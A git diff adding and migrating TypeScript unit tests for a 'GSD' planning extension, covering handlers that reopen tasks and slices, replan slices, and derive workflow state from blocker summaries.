+test('handleReopenSlice: rejects non-existent milestone', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+  try {
+    const result = await handleReopenSlice({ milestoneId: 'M999', sliceId: 'S01' }, base);
+    assert.ok('error' in result);
+    assert.match(result.error, /milestone not found/);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('handleReopenSlice: rejects slice in a closed milestone', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+  try {
+    insertMilestone({ id: 'M001', title: 'Done', status: 'complete' });
+    insertSlice({ id: 'S01', milestoneId: 'M001', status: 'complete' });
+    insertTask({ id: 'T01', sliceId: 'S01', milestoneId: 'M001', status: 'complete' });
+
+    const result = await handleReopenSlice({ milestoneId: 'M001', sliceId: 'S01' }, base);
+    assert.ok('error' in result);
+    assert.match(result.error, /closed milestone/);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('handleReopenSlice: rejects reopening a slice that is not complete', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+  try {
+    insertMilestone({ id: 'M001', title: 'Active', status: 'active' });
+    insertSlice({ id: 'S01', milestoneId: 'M001', status: 'in_progress' });
+
+    const result = await handleReopenSlice({ milestoneId: 'M001', sliceId: 'S01' }, base);
+    assert.ok('error' in result);
+    assert.match(result.error, /not complete/);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('handleReopenSlice: rejects non-existent slice', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+  try {
+    insertMilestone({ id: 'M001', title: 'Active', status: 'active' });
+
+    const result = await handleReopenSlice({ milestoneId: 'M001', sliceId: 'S99' }, base);
+    assert.ok('error' in result);
+    assert.match(result.error, /slice not found/);
+  } finally {
+    cleanup(base);
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/reopen-task.test.ts b/src/resources/extensions/gsd/tests/reopen-task.test.ts
new file mode 100644
index 000000000..aa43c3f5f
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/reopen-task.test.ts
@@ -0,0 +1,165 @@
+// GSD — reopen-task handler tests
+// Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+
+import test from 'node:test';
+import assert from 'node:assert/strict';
+import { mkdtempSync, mkdirSync, rmSync } from 'node:fs';
+import { join } from 'node:path';
+import { tmpdir } from 'node:os';
+
+import {
+  openDatabase,
+  closeDatabase,
+  insertMilestone,
+  insertSlice,
+  insertTask,
+  getTask,
+} from '../gsd-db.ts';
+import { handleReopenTask } from '../tools/reopen-task.ts';
+
+function makeTmpBase(): string {
+  const base = mkdtempSync(join(tmpdir(), 'gsd-reopen-task-'));
+  mkdirSync(join(base, '.gsd', 'milestones', 'M001', 'slices', 'S01', 'tasks'), { recursive: true });
+  return base;
+}
+
+function cleanup(base: string): void {
+  try { closeDatabase(); } catch { /* noop */ }
+  try { rmSync(base, { recursive: true, force: true }); } catch { /* noop */ }
+}
+
+function seedCompleteTask(): void {
+  insertMilestone({ id: 'M001', title: 'Test Milestone', status: 'active' });
+  insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Test Slice', status: 'in_progress' });
+  insertTask({ id: 'T01', sliceId: 'S01', milestoneId: 'M001', title: 'Task One', status: 'complete' });
+  insertTask({ id: 'T02', sliceId: 'S01', milestoneId: 'M001', title: 'Task Two', status: 'pending' });
+}
+
+// ─── Success path ────────────────────────────────────────────────────────
+
+test('handleReopenTask: resets a complete task to pending', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+  try {
+    seedCompleteTask();
+
+    const result = await handleReopenTask({
+      milestoneId: 'M001',
+      sliceId: 'S01',
+      taskId: 'T01',
+      reason: 'verification failed after merge',
+    }, base);
+
+    assert.ok(!('error' in result), `unexpected error: ${'error' in result ? result.error : ''}`);
+    assert.equal(result.taskId, 'T01');
+
+    const task = getTask('M001', 'S01', 'T01');
+    assert.ok(task, 'task should still exist');
+    assert.equal(task!.status, 'pending', 'task status should be reset to pending');
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('handleReopenTask: does not affect other tasks in the slice', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+  try {
+    seedCompleteTask();
+
+    await handleReopenTask({ milestoneId: 'M001', sliceId: 'S01', taskId: 'T01' }, base);
+
+    const t02 = getTask('M001', 'S01', 'T02');
+    assert.ok(t02, 'T02 should still exist');
+    assert.equal(t02!.status, 'pending', 'T02 status should be unchanged');
+  } finally {
+    cleanup(base);
+  }
+});
+
+// ─── Failure paths ───────────────────────────────────────────────────────
+
+test('handleReopenTask: rejects empty taskId', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+  try {
+    const result = await handleReopenTask({ milestoneId: 'M001', sliceId: 'S01', taskId: '' }, base);
+    assert.ok('error' in result);
+    assert.match(result.error, /taskId/);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('handleReopenTask: rejects non-existent milestone', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+  try {
+    const result = await handleReopenTask({ milestoneId: 'M999', sliceId: 'S01', taskId: 'T01' }, base);
+    assert.ok('error' in result);
+    assert.match(result.error, /milestone not found/);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('handleReopenTask: rejects task in a closed milestone', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+  try {
+    insertMilestone({ id: 'M001', title: 'Done', status: 'complete' });
+    insertSlice({ id: 'S01', milestoneId: 'M001', status: 'complete' });
+    insertTask({ id: 'T01', sliceId: 'S01', milestoneId: 'M001', status: 'complete' });
+
+    const result = await handleReopenTask({ milestoneId: 'M001', sliceId: 'S01', taskId: 'T01' }, base);
+    assert.ok('error' in result);
+    assert.match(result.error, /closed milestone/);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('handleReopenTask: rejects task inside a closed slice', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+  try {
+    insertMilestone({ id: 'M001', title: 'Active', status: 'active' });
+    insertSlice({ id: 'S01', milestoneId: 'M001', status: 'complete' });
+    insertTask({ id: 'T01', sliceId: 'S01', milestoneId: 'M001', status: 'complete' });
+
+    const result = await handleReopenTask({ milestoneId: 'M001', sliceId: 'S01', taskId: 'T01' }, base);
+    assert.ok('error' in result);
+    assert.match(result.error, /closed slice/);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('handleReopenTask: rejects reopening a task that is not complete', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+  try {
+    seedCompleteTask();
+
+    const result = await handleReopenTask({ milestoneId: 'M001', sliceId: 'S01', taskId: 'T02' }, base);
+    assert.ok('error' in result);
+    assert.match(result.error, /not complete/);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('handleReopenTask: rejects non-existent task', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+  try {
+    insertMilestone({ id: 'M001', title: 'Active', status: 'active' });
+    insertSlice({ id: 'S01', milestoneId: 'M001', status: 'in_progress' });
+
+    const result = await handleReopenTask({ milestoneId: 'M001', sliceId: 'S01', taskId: 'T99' }, base);
+    assert.ok('error' in result);
+    assert.match(result.error, /task not found/);
+  } finally {
+    cleanup(base);
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/replan-handler.test.ts b/src/resources/extensions/gsd/tests/replan-handler.test.ts
new file mode 100644
index 000000000..66ef8d3ab
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/replan-handler.test.ts
@@ -0,0 +1,410 @@
+import test from 'node:test';
+import assert from 'node:assert/strict';
+import { mkdtempSync, mkdirSync, rmSync, readFileSync, existsSync } from 'node:fs';
+import { join } from 'node:path';
+import { tmpdir } from 'node:os';
+
+import {
+  openDatabase,
+  closeDatabase,
+  insertMilestone,
+  insertSlice,
+  insertTask,
+  upsertTaskPlanning,
+  getSliceTasks,
+  getTask,
+  getReplanHistory,
+  _getAdapter,
+} from '../gsd-db.ts';
+import { handleReplanSlice } from '../tools/replan-slice.ts';
+import { parsePlan } from '../parsers-legacy.ts';
+
+function makeTmpBase(): string {
+  const base = mkdtempSync(join(tmpdir(), 'gsd-replan-'));
+  mkdirSync(join(base, '.gsd', 'milestones', 'M001', 'slices', 'S01', 'tasks'), { recursive: true });
+  return base;
+}
+
+function cleanup(base: string): void {
+  try { closeDatabase(); } catch { /* noop */ }
+  try { rmSync(base, { recursive: true, force: true }); } catch { /* noop */ }
+}
+
+function seedSliceWithTasks(opts?: {
+  t01Status?: string;
+  t02Status?: string;
+  t03Status?: string;
+}): void {
+  insertMilestone({ id: 'M001', title: 'Test Milestone', status: 'active' });
+  insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Test Slice', status: 'active', demo: 'Demo.' });
+
+  insertTask({ id: 'T01', sliceId: 'S01', milestoneId: 'M001', title: 'Task One', status: opts?.t01Status ?? 'complete' });
+  upsertTaskPlanning('M001', 'S01', 'T01', {
+    description: 'First task description.',
+    estimate: '30m',
+    files: ['src/a.ts'],
+    verify: 'node --test a.test.ts',
+    inputs: ['src/a.ts'],
+    expectedOutput: ['src/a.ts'],
+  });
+
+  insertTask({ id: 'T02', sliceId: 'S01', milestoneId: 'M001', title: 'Task Two', status: opts?.t02Status ?? 'pending' });
+  upsertTaskPlanning('M001', 'S01', 'T02', {
+    description: 'Second task description.',
+    estimate: '45m',
+    files: ['src/b.ts'],
+    verify: 'node --test b.test.ts',
+    inputs: ['src/b.ts'],
+    expectedOutput: ['src/b.ts'],
+  });
+
+  if (opts?.t03Status !== undefined || !opts) {
+    insertTask({ id: 'T03', sliceId: 'S01', milestoneId: 'M001', title: 'Task Three', status: opts?.t03Status ?? 'pending' });
+    upsertTaskPlanning('M001', 'S01', 'T03', {
+      description: 'Third task description.',
+      estimate: '20m',
+      files: ['src/c.ts'],
+      verify: 'node --test c.test.ts',
+      inputs: ['src/c.ts'],
+      expectedOutput: ['src/c.ts'],
+    });
+  }
+}
+
+function validReplanParams() {
+  return {
+    milestoneId: 'M001',
+    sliceId: 'S01',
+    blockerTaskId: 'T01',
+    blockerDescription: 'T01 discovered a blocker in the API.',
+    whatChanged: 'Updated T02 to use new API, removed T03, added T04.',
+    updatedTasks: [
+      {
+        taskId: 'T02',
+        title: 'Updated Task Two',
+        description: 'Revised description for T02.',
+        estimate: '1h',
+        files: ['src/b-v2.ts'],
+        verify: 'node --test b-v2.test.ts',
+        inputs: ['src/b.ts'],
+        expectedOutput: ['src/b-v2.ts'],
+      },
+    ],
+    removedTaskIds: ['T03'],
+  };
+}
+
+// ─── Tests ────────────────────────────────────────────────────────────────
+
+test('handleReplanSlice rejects invalid payloads (missing milestoneId)', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+
+  try {
+    seedSliceWithTasks();
+    const result = await handleReplanSlice({ ...validReplanParams(), milestoneId: '' }, base);
+    assert.ok('error' in result);
+    assert.match(result.error, /validation failed/);
+    assert.match(result.error, /milestoneId/);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('handleReplanSlice rejects structural violation: updating a completed task', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+
+  try {
+    seedSliceWithTasks({ t01Status: 'complete', t02Status: 'pending' });
+
+    const result = await handleReplanSlice({
+      ...validReplanParams(),
+      updatedTasks: [
+        {
+          taskId: 'T01',
+          title: 'Trying to update completed T01',
+          description: 'Should be rejected.',
+          estimate: '1h',
+          files: [],
+          verify: '',
+          inputs: [],
+          expectedOutput: [],
+        },
+      ],
+      removedTaskIds: [],
+    }, base);
+
+    assert.ok('error' in result);
+    assert.match(result.error, /completed task/);
+    assert.match(result.error, /T01/);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('handleReplanSlice rejects structural violation: removing a completed task', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+
+  try {
+    seedSliceWithTasks({ t01Status: 'complete', t02Status: 'pending' });
+
+    const result = await handleReplanSlice({
+      ...validReplanParams(),
+      updatedTasks: [],
+      removedTaskIds: ['T01'],
+    }, base);
+
+    assert.ok('error' in result);
+    assert.match(result.error, /completed task/);
+    assert.match(result.error, /T01/);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('handleReplanSlice succeeds when modifying only incomplete tasks', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+
+  try {
+    seedSliceWithTasks({ t01Status: 'complete', t02Status: 'pending', t03Status: 'pending' });
+
+    const params = {
+      ...validReplanParams(),
+      updatedTasks: [
+        {
+          taskId: 'T02',
+          title: 'Updated Task Two',
+          description: 'Revised description for T02.',
+          estimate: '1h',
+          files: ['src/b-v2.ts'],
+          verify: 'node --test b-v2.test.ts',
+          inputs: ['src/b.ts'],
+          expectedOutput: ['src/b-v2.ts'],
+        },
+        {
+          taskId: 'T04',
+          title: 'New Task Four',
+          description: 'Brand new task added during replan.',
+          estimate: '30m',
+          files: ['src/d.ts'],
+          verify: 'node --test d.test.ts',
+          inputs: [],
+          expectedOutput: ['src/d.ts'],
+        },
+      ],
+      removedTaskIds: ['T03'],
+    };
+
+    const result = await handleReplanSlice(params, base);
+    assert.ok(!('error' in result), `unexpected error: ${'error' in result ? result.error : ''}`);
+
+    // Verify replan_history row exists
+    const history = getReplanHistory('M001', 'S01');
+    assert.ok(history.length > 0, 'replan_history should have at least one entry');
+    assert.equal(history[0]['milestone_id'], 'M001');
+    assert.equal(history[0]['slice_id'], 'S01');
+    assert.equal(history[0]['task_id'], 'T01');
+
+    // Verify T02 was updated
+    const t02 = getTask('M001', 'S01', 'T02');
+    assert.ok(t02, 'T02 should still exist');
+    assert.equal(t02?.title, 'Updated Task Two');
+    assert.equal(t02?.description, 'Revised description for T02.');
+
+    // Verify T03 was deleted
+    const t03 = getTask('M001', 'S01', 'T03');
+    assert.equal(t03, null, 'T03 should have been deleted');
+
+    // Verify T04 was inserted
+    const t04 = getTask('M001', 'S01', 'T04');
+    assert.ok(t04, 'T04 should exist as a new task');
+    assert.equal(t04?.title, 'New Task Four');
+    assert.equal(t04?.status, 'pending');
+
+    // Verify T01 (completed) was NOT touched
+    const t01 = getTask('M001', 'S01', 'T01');
+    assert.ok(t01, 'T01 should still exist');
+    assert.equal(t01?.status, 'complete');
+
+    // Verify rendered PLAN.md exists on disk
+    const planPath = join(base, '.gsd', 'milestones', 'M001', 'slices', 'S01', 'S01-PLAN.md');
+    assert.ok(existsSync(planPath), 'PLAN.md should be rendered to disk');
+
+    // Verify REPLAN.md exists on disk
+    const replanPath = join(base, '.gsd', 'milestones', 'M001', 'slices', 'S01', 'S01-REPLAN.md');
+    assert.ok(existsSync(replanPath), 'REPLAN.md should be rendered to disk');
+    const replanContent = readFileSync(replanPath, 'utf-8');
+    assert.ok(replanContent.includes('Blocker Description'), 'REPLAN.md should contain blocker section');
+    assert.ok(replanContent.includes('T01'), 'REPLAN.md should reference blocker task');
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('handleReplanSlice cache invalidation: re-parsing PLAN.md reflects mutations', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+
+  try {
+    seedSliceWithTasks({ t01Status: 'complete', t02Status: 'pending', t03Status: 'pending' });
+
+    const params = {
+      ...validReplanParams(),
+      updatedTasks: [
+        {
+          taskId: 'T02',
+          title: 'Cache-Test Updated T02',
+          description: 'This title should appear in re-parsed plan.',
+          estimate: '1h',
+          files: ['src/b.ts'],
+          verify: 'test',
+          inputs: [],
+          expectedOutput: [],
+        },
+      ],
+      removedTaskIds: ['T03'],
+    };
+
+    const result = await handleReplanSlice(params, base);
+    assert.ok(!('error' in result), `unexpected error: ${'error' in result ? result.error : ''}`);
+
+    // Re-parse PLAN.md from disk to verify cache invalidation worked
+    const planPath = join(base, '.gsd', 'milestones', 'M001', 'slices', 'S01', 'S01-PLAN.md');
+    const content = readFileSync(planPath, 'utf-8');
+    const parsed = parsePlan(content);
+
+    // T01 should still be present (completed, untouched)
+    const t01Task = parsed.tasks.find(t => t.id === 'T01');
+    assert.ok(t01Task, 'completed T01 should remain in parsed plan');
+
+    // T02 should show updated title
+    const t02Task = parsed.tasks.find(t => t.id === 'T02');
+    assert.ok(t02Task, 'T02 should be in parsed plan');
+    assert.ok(t02Task?.title?.includes('Cache-Test Updated T02'), 'T02 title should be updated');
+
+    // T03 should be gone
+    const t03Task = parsed.tasks.find(t => t.id === 'T03');
+    assert.equal(t03Task, undefined, 'T03 should not appear in parsed plan after removal');
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('handleReplanSlice is idempotent: calling twice with same params succeeds', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+
+  try {
+    seedSliceWithTasks({ t01Status: 'complete', t02Status: 'pending', t03Status: 'pending' });
+
+    const params = {
+      ...validReplanParams(),
+      updatedTasks: [
+        {
+          taskId: 'T02',
+          title: 'Idempotent Update',
+          description: 'Same update applied twice.',
+          estimate: '1h',
+          files: ['src/b.ts'],
+          verify: 'test',
+          inputs: [],
+          expectedOutput: [],
+        },
+      ],
+      removedTaskIds: ['T03'],
+    };
+
+    const first = await handleReplanSlice(params, base);
+    assert.ok(!('error' in first), `first call error: ${'error' in first ? first.error : ''}`);
+
+    const second = await handleReplanSlice(params, base);
+    assert.ok(!('error' in second), `second call error: ${'error' in second ? second.error : ''}`);
+
+    // Both should succeed and replan_history should have 2 entries
+    const history = getReplanHistory('M001', 'S01');
+    assert.ok(history.length >= 2, 'replan_history should have at least 2 entries after idempotent rerun');
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('handleReplanSlice returns missing parent slice error', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+
+  try {
+    insertMilestone({ id: 'M001', title: 'Milestone', status: 'active' });
+    // No slice inserted
+
+    const result = await handleReplanSlice(validReplanParams(), base);
+    assert.ok('error' in result);
+    assert.match(result.error, /missing parent slice/);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('handleReplanSlice rejects task with status "done" (alias for complete)', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+
+  try {
+    seedSliceWithTasks({ t01Status: 'done', t02Status: 'pending' });
+
+    const result = await handleReplanSlice({
+      ...validReplanParams(),
+      updatedTasks: [
+        {
+          taskId: 'T01',
+          title: 'Trying to update done T01',
+          description: 'Should be rejected.',
+          estimate: '1h',
+          files: [],
+          verify: '',
+          inputs: [],
+          expectedOutput: [],
+        },
+      ],
+      removedTaskIds: [],
+    }, base);
+
+    assert.ok('error' in result);
+    assert.match(result.error, /completed task/);
+    assert.match(result.error, /T01/);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('handleReplanSlice returns structured error payloads with actionable messages', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+
+  try {
+    seedSliceWithTasks({ t01Status: 'complete', t02Status: 'complete', t03Status: 'pending' });
+
+    // Try to modify T01 (completed)
+    const modifyResult = await handleReplanSlice({
+      ...validReplanParams(),
+      updatedTasks: [{ taskId: 'T01', title: 'x', description: '', estimate: '', files: [], verify: '', inputs: [], expectedOutput: [] }],
+      removedTaskIds: [],
+    }, base);
+    assert.ok('error' in modifyResult);
+    assert.ok(typeof modifyResult.error === 'string', 'error should be a string');
+    assert.ok(modifyResult.error.includes('T01'), 'error should name the specific task ID');
+
+    // Try to remove T02 (completed)
+    const removeResult = await handleReplanSlice({
+      ...validReplanParams(),
+      updatedTasks: [],
+      removedTaskIds: ['T02'],
+    }, base);
+    assert.ok('error' in removeResult);
+    assert.ok(removeResult.error.includes('T02'), 'error should name the specific task ID T02');
+  } finally {
+    cleanup(base);
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/replan-slice.test.ts b/src/resources/extensions/gsd/tests/replan-slice.test.ts
index 73eddeb92..f7804dd8d 100644
--- a/src/resources/extensions/gsd/tests/replan-slice.test.ts
+++ b/src/resources/extensions/gsd/tests/replan-slice.test.ts
@@ -1,3 +1,5 @@
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
 import { mkdtempSync, mkdirSync, readFileSync, rmSync, writeFileSync } from 'node:fs';
 import { join, dirname } from 'node:path';
 import { tmpdir } from 'node:os';
@@ -22,7 +24,6 @@ function loadPromptFromWorktree(name: string, vars: Record<string, string> = {})
   return content.trim();
 }
 
-const { assertEq, assertTrue, report } = createTestContext();
 // ─── Fixture Helpers ───────────────────────────────────────────────────────
 
 function createFixtureBase(): string {
@@ -161,7 +162,7 @@ Found a blocker.
 `;
 
   const s = parseSummary(content);
-  assertEq(s.frontmatter.blocker_discovered, true, 'blocker_discovered: true (string) extracts as true');
+  assert.deepStrictEqual(s.frontmatter.blocker_discovered, true, 'blocker_discovered: true (string) extracts as true');
 }
 
 console.log('\n=== parseSummary: blocker_discovered false (string) ===');
@@ -184,7 +185,7 @@ No blocker.
 `;
 
   const s = parseSummary(content);
-  assertEq(s.frontmatter.blocker_discovered, false, 'blocker_discovered: false extracts as false');
+  assert.deepStrictEqual(s.frontmatter.blocker_discovered, false, 'blocker_discovered: false extracts as false');
 }
 
 console.log('\n=== parseSummary: blocker_discovered missing (defaults to false) ===');
@@ -206,7 +207,7 @@ No blocker field at all.
 `;
 
   const s = parseSummary(content);
-  assertEq(s.frontmatter.blocker_discovered, false, 'blocker_discovered missing defaults to false');
+  assert.deepStrictEqual(s.frontmatter.blocker_discovered, false, 'blocker_discovered missing defaults to false');
 }
 
 console.log('\n=== parseSummary: blocker_discovered true (boolean from YAML) ===');
@@ -232,7 +233,7 @@ Blocker as boolean.
 `;
 
   const s = parseSummary(content);
-  assertEq(s.frontmatter.blocker_discovered, true, 'blocker_discovered: true (YAML boolean) extracts as true');
+  assert.deepStrictEqual(s.frontmatter.blocker_discovered, true, 'blocker_discovered: true (YAML boolean) extracts as true');
 }
 
 console.log('\n=== parseSummary: blocker_discovered with full frontmatter ===');
@@ -275,10 +276,10 @@ Major deviation from plan.
 `;
 
   const s = parseSummary(content);
-  assertEq(s.frontmatter.blocker_discovered, true, 'blocker_discovered true with full frontmatter');
-  assertEq(s.frontmatter.id, 'T05', 'other fields still parse correctly alongside blocker_discovered');
-  assertEq(s.frontmatter.duration, '15min', 'duration still parsed');
-  assertEq(s.frontmatter.provides[0], 'something', 'provides still parsed');
+  assert.deepStrictEqual(s.frontmatter.blocker_discovered, true, 'blocker_discovered true with full frontmatter');
+  assert.deepStrictEqual(s.frontmatter.id, 'T05', 'other fields still parse correctly alongside blocker_discovered');
+  assert.deepStrictEqual(s.frontmatter.duration, '15min', 'duration still parsed');
+  assert.deepStrictEqual(s.frontmatter.provides[0], 'something', 'provides still parsed');
 }
 
 // ═══════════════════════════════════════════════════════════════════════════
@@ -294,11 +295,11 @@ console.log('\n=== deriveState: blocker found, no REPLAN → replanning-slice ==
   writeTaskSummary(base, 'M001', 'S01', 'T01', makeTaskSummary('T01', true));
 
   const state = await deriveState(base);
-  assertEq(state.phase, 'replanning-slice', 'phase is replanning-slice when blocker found and no REPLAN.md');
-  assertTrue(state.nextAction.includes('T01'), 'nextAction mentions blocker task T01');
-  assertTrue(state.nextAction.includes('blocker_discovered'), 'nextAction mentions blocker_discovered');
-  assertEq(state.activeTask?.id, 'T02', 'activeTask is still T02 (the next incomplete task)');
-  assertTrue(state.blockers.length > 0, 'blockers array is non-empty');
+  assert.deepStrictEqual(state.phase, 'replanning-slice', 'phase is replanning-slice when blocker found and no REPLAN.md');
+  assert.ok(state.nextAction.includes('T01'), 'nextAction mentions blocker task T01');
+  assert.ok(state.nextAction.includes('blocker_discovered'), 'nextAction mentions blocker_discovered');
+  assert.deepStrictEqual(state.activeTask?.id, 'T02', 'activeTask is still T02 (the next incomplete task)');
+  assert.ok(state.blockers.length > 0, 'blockers array is non-empty');
   rmSync(base, { recursive: true, force: true });
 }
 
@@ -312,8 +313,8 @@ console.log('\n=== deriveState: blocker found + REPLAN exists → executing (loo
   writeReplanFile(base, 'M001', 'S01', '# Replan\n\nAlready replanned.');
 
   const state = await deriveState(base);
-  assertEq(state.phase, 'executing', 'phase is executing when REPLAN.md exists (loop protection)');
-  assertEq(state.activeTask?.id, 'T02', 'activeTask is T02');
+  assert.deepStrictEqual(state.phase, 'executing', 'phase is executing when REPLAN.md exists (loop protection)');
+  assert.deepStrictEqual(state.activeTask?.id, 'T02', 'activeTask is T02');
   rmSync(base, { recursive: true, force: true });
 }
 
@@ -326,8 +327,8 @@ console.log('\n=== deriveState: no blocker in completed tasks → executing ==='
   writeTaskSummary(base, 'M001', 'S01', 'T01', makeTaskSummary('T01', false));
 
   const state = await deriveState(base);
-  assertEq(state.phase, 'executing', 'phase is executing when no blocker found');
-  assertEq(state.activeTask?.id, 'T02', 'activeTask is T02');
+  assert.deepStrictEqual(state.phase, 'executing', 'phase is executing when no blocker found');
+  assert.deepStrictEqual(state.activeTask?.id, 'T02', 'activeTask is T02');
   rmSync(base, { recursive: true, force: true });
 }
 
@@ -341,9 +342,9 @@ console.log('\n=== deriveState: multiple completed tasks, one blocker → replan
   writeTaskSummary(base, 'M001', 'S01', 'T02', makeTaskSummary('T02', true));
 
   const state = await deriveState(base);
-  assertEq(state.phase, 'replanning-slice', 'phase is replanning-slice when T02 has blocker');
-  assertTrue(state.nextAction.includes('T02'), 'nextAction mentions blocker task T02');
-  assertEq(state.activeTask?.id, 'T03', 'activeTask is T03 (next incomplete)');
+  assert.deepStrictEqual(state.phase, 'replanning-slice', 'phase is replanning-slice when T02 has blocker');
+  assert.ok(state.nextAction.includes('T02'), 'nextAction mentions blocker task T02');
+  assert.deepStrictEqual(state.activeTask?.id, 'T03', 'activeTask is T03 (next incomplete)');
   rmSync(base, { recursive: true, force: true });
 }
 
@@ -356,7 +357,7 @@ console.log('\n=== deriveState: completed task with no summary file → executin
   // No summary file written for T01
 
   const state = await deriveState(base);
-  assertEq(state.phase, 'executing', 'phase is executing when completed task has no summary');
+  assert.deepStrictEqual(state.phase, 'executing', 'phase is executing when completed task has no summary');
   rmSync(base, { recursive: true, force: true });
 }
 
@@ -376,11 +377,11 @@ console.log('\n=== prompt: replan-slice template loads and substitutes variables
     inlinedContext: '## Inlined Context\n\nTest context here.',
   });
 
-  assertTrue(prompt.includes('M001'), 'prompt contains milestoneId');
-  assertTrue(prompt.includes('S01'), 'prompt contains sliceId');
-  assertTrue(prompt.includes('Test Slice'), 'prompt contains sliceTitle');
-  assertTrue(prompt.includes('.gsd/milestones/M001/slices/S01/S01-PLAN.md'), 'prompt contains planPath');
-  assertTrue(prompt.includes('Test context here'), 'prompt contains inlined context');
+  assert.ok(prompt.includes('M001'), 'prompt contains milestoneId');
+  assert.ok(prompt.includes('S01'), 'prompt contains sliceId');
+  assert.ok(prompt.includes('Test Slice'), 'prompt contains sliceTitle');
+  assert.ok(prompt.includes('.gsd/milestones/M001/slices/S01/S01-PLAN.md'), 'prompt contains planPath');
+  assert.ok(prompt.includes('Test context here'), 'prompt contains inlined context');
 }
 
 console.log('\n=== prompt: replan-slice contains preserve-completed-tasks instruction ===');
@@ -397,10 +398,10 @@ console.log('\n=== prompt: replan-slice contains preserve-completed-tasks instru
     inlinedContext: '',
   });
 
-  assertTrue(prompt.includes('Do NOT renumber or remove completed tasks'), 'prompt contains preserve-completed-tasks instruction');
-  assertTrue(prompt.includes('[x]'), 'prompt mentions [x] checkmarks');
-  assertTrue(prompt.includes('REPLAN'), 'prompt references replan output path');
-  assertTrue(prompt.includes('blocker_discovered'), 'prompt mentions blocker_discovered');
+  assert.ok(prompt.includes('Do NOT renumber or remove completed tasks'), 'prompt contains preserve-completed-tasks instruction');
+  assert.ok(prompt.includes('[x]'), 'prompt mentions [x] checkmarks');
+  assert.ok(prompt.includes('REPLAN'), 'prompt references replan output path');
+  assert.ok(prompt.includes('blocker_discovered'), 'prompt mentions blocker_discovered');
 }
 
 // ═══════════════════════════════════════════════════════════════════════════
@@ -421,8 +422,8 @@ console.log('\n=== dispatch: diagnoseExpectedArtifact returns REPLAN.md path ===
   writeTaskSummary(base, 'M001', 'S01', 'T01', makeTaskSummary('T01', true));
 
   const state = await deriveState(base);
-  assertEq(state.phase, 'replanning-slice', 'dispatch: state routes to replanning-slice when blocker found');
-  assertTrue(state.activeSlice?.id === 'S01', 'dispatch: activeSlice is S01');
+  assert.deepStrictEqual(state.phase, 'replanning-slice', 'dispatch: state routes to replanning-slice when blocker found');
+  assert.ok(state.activeSlice?.id === 'S01', 'dispatch: activeSlice is S01');
   rmSync(base, { recursive: true, force: true });
 }
 
@@ -443,8 +444,8 @@ console.log('\n=== display: replan-slice prompt template has correct unit header
     inlinedContext: '',
   });
 
-  assertTrue(prompt.includes('UNIT: Replan Slice'), 'prompt has Replan Slice unit header');
-  assertTrue(prompt.includes('Slice S01 replanned'), 'prompt has completion message');
+  assert.ok(prompt.includes('UNIT: Replan Slice'), 'prompt has Replan Slice unit header');
+  assert.ok(prompt.includes('Slice S01 replanned'), 'prompt has completion message');
 }
 
 // ═══════════════════════════════════════════════════════════════════════════
@@ -452,8 +453,6 @@ console.log('\n=== display: replan-slice prompt template has correct unit header
 // ═══════════════════════════════════════════════════════════════════════════
 
 import { runGSDDoctor } from '../doctor.ts';
-import { createTestContext } from './test-helpers.ts';
-
 // (a) blocker + no REPLAN.md → issue emitted
 console.log('\n=== doctor: blocker + no REPLAN.md → blocker_discovered_no_replan issue ===');
 {
